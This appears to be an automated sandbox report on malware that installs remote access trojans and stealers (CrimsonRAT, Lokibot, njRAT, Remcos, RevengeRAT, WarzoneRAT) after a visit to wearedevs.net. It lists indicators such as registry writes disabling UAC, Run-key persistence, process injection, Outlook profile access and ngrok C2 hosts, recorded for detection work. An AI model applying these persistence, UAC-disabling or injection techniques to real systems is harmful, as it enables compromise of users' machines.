Malware Analysis Report

2025-01-18 16:14

Sample ID 241222-2p3c6a1pen
Target http://wearedevs.net
Tags
crimsonrat lokibot njrat remcos revengerat warzonerat guest host agilenet collection discovery evasion execution infostealer persistence privilege_escalation rat rezer0 spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://wearedevs.net was found to be: Known bad.

Malicious Activity Summary

crimsonrat lokibot njrat remcos revengerat warzonerat guest host agilenet collection discovery evasion execution infostealer persistence privilege_escalation rat rezer0 spyware stealer trojan

njRAT/Bladabindi

UAC bypass

RevengeRAT

Lokibot family

Warzonerat family

Crimsonrat family

Njrat family

Lokibot

WarzoneRat, AveMaria

Revengerat family

CrimsonRAT main payload

Remcos family

CrimsonRat

Remcos

RevengeRat Executable

ReZer0 packer

Warzone RAT payload

Modifies Windows Firewall

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Obfuscated with Agile.Net obfuscator

Uses the VBS compiler for execution

Drops startup file

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Accesses Microsoft Outlook profiles

Probable phishing domain

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Browser Information Discovery

System Network Configuration Discovery: Internet Connection Discovery

Suspicious use of FindShellTrayWindow

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

outlook_win_path

outlook_office_path

Scheduled Task/Job: Scheduled Task

Modifies registry class

NTFS ADS

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-22 22:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-22 22:46

Reported

2024-12-22 22:52

Platform

win10v2004-20241007-en

Max time kernel

363s

Max time network

364s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://wearedevs.net

Signatures

CrimsonRAT main payload

Description Indicator Process Target
N/A N/A N/A N/A

CrimsonRat

rat crimsonrat

Crimsonrat family

crimsonrat

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Njrat family

njrat

Remcos

rat remcos

Remcos family

remcos

RevengeRAT

trojan revengerat

Revengerat family

revengerat

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

WarzoneRat, AveMaria

rat infostealer warzonerat

Warzonerat family

warzonerat

njRAT/Bladabindi

trojan njrat

ReZer0 packer

rezer0
Description Indicator Process Target
N/A N/A N/A N/A

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CrimsonRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CrimsonRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CrimsonRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\Remcos.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CrimsonRAT.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe C:\Users\Admin\Downloads\NJRat.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA C:\Users\Admin\Downloads\NJRat.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:SmartScreen:$DATA C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe C:\Users\Admin\Downloads\NJRat.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\Remcos.exe N/A
N/A N/A C:\Users\Admin\Downloads\Remcos.exe N/A
N/A N/A C:\Users\Admin\Downloads\Remcos.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Windows\SysWOW64\Userdata\Userdata.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\CrimsonRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\CrimsonRAT.exe N/A
N/A N/A C:\ProgramData\Hdlharas\dlrarhsiva.exe N/A
N/A N/A C:\ProgramData\Hdlharas\dlrarhsiva.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\RevengeRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\NJRat.exe N/A
N/A N/A C:\Users\Admin\Downloads\CrimsonRAT.exe N/A
N/A N/A C:\Users\Admin\Downloads\CrimsonRAT.exe N/A
N/A N/A C:\ProgramData\Hdlharas\dlrarhsiva.exe N/A
N/A N/A C:\ProgramData\Hdlharas\dlrarhsiva.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\Lokibot.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\Lokibot.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\Lokibot.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\Lokibot.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\"" C:\Users\Admin\Downloads\Remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\"" C:\Windows\SysWOW64\Userdata\Userdata.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." C:\Users\Admin\Downloads\NJRat.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." C:\Users\Admin\Downloads\NJRat.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe" C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A 0.tcp.ngrok.io N/A N/A
N/A 0.tcp.ngrok.io N/A N/A
N/A 0.tcp.ngrok.io N/A N/A
N/A 0.tcp.ngrok.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Userdata\Userdata.exe C:\Users\Admin\Downloads\Remcos.exe N/A
File opened for modification C:\Windows\SysWOW64\Userdata\Userdata.exe C:\Users\Admin\Downloads\Remcos.exe N/A
File created C:\Windows\SysWOW64\Userdata\Userdata.exe:SmartScreen:$DATA C:\Users\Admin\Downloads\Remcos.exe N/A
File opened for modification C:\Windows\SysWOW64\Userdata C:\Users\Admin\Downloads\Remcos.exe N/A
File created C:\Windows\SysWOW64\Userdata\Userdata.exe C:\Users\Admin\Downloads\Remcos.exe N/A
File created C:\Windows\SysWOW64\Userdata\Userdata.exe C:\Users\Admin\Downloads\Remcos.exe N/A

Probable phishing domain

Description Indicator Process Target
HTTP URL https://sourceforge.net/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8f63ab484d4a63d1 N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5248 set thread context of 4088 N/A C:\Users\Admin\Downloads\RevengeRAT.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 4700 set thread context of 4572 N/A C:\Users\Admin\Downloads\RevengeRAT.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 4088 set thread context of 3044 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 4572 set thread context of 3268 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1476 set thread context of 5124 N/A C:\Users\Admin\Downloads\Remcos.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2388 set thread context of 532 N/A C:\Users\Admin\Downloads\Remcos.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 5008 set thread context of 392 N/A C:\Windows\SysWOW64\Userdata\Userdata.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 1988 set thread context of 5560 N/A C:\Users\Admin\Downloads\WarzoneRAT.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 800 set thread context of 1680 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1680 set thread context of 392 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 5316 set thread context of 5320 N/A C:\Users\Admin\Downloads\RevengeRAT.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 5320 set thread context of 1828 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 3640 set thread context of 5172 N/A C:\Users\Admin\Downloads\RevengeRAT.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 5172 set thread context of 5240 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 4460 set thread context of 3972 N/A C:\Users\Admin\Downloads\WarzoneRAT.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5264 set thread context of 5256 N/A C:\Users\Admin\Downloads\WarzoneRAT.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5224 set thread context of 5392 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 5392 set thread context of 800 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 3432 set thread context of 1928 N/A C:\Users\Admin\Downloads\Lokibot.exe C:\Users\Admin\Downloads\Lokibot.exe
PID 3568 set thread context of 3540 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 3540 set thread context of 1776 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\WarzoneRAT.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Userdata\Userdata.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Lokibot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\NJRat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Lokibot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Lokibot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\NJRat.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\svchost\svchost.exe\:SmartScreen:$DATA C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\svchost.exe\:SmartScreen:$DATA C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 389843.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 230875.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 242210.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 807091.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 770873.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:SmartScreen:$DATA C:\Users\Admin\Downloads\WarzoneRAT.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 44579.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 707347.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
